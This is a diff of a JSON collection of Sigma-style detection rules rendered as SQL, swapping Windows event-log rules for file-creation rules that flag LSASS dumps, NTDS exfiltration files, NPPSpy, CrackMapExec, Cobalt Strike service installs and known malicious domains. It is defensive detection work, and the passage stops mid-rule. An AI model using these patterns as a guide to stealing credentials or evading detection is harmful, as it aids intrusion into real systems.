"win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Antivirus products" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "status": "test", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msteams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Slack.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' 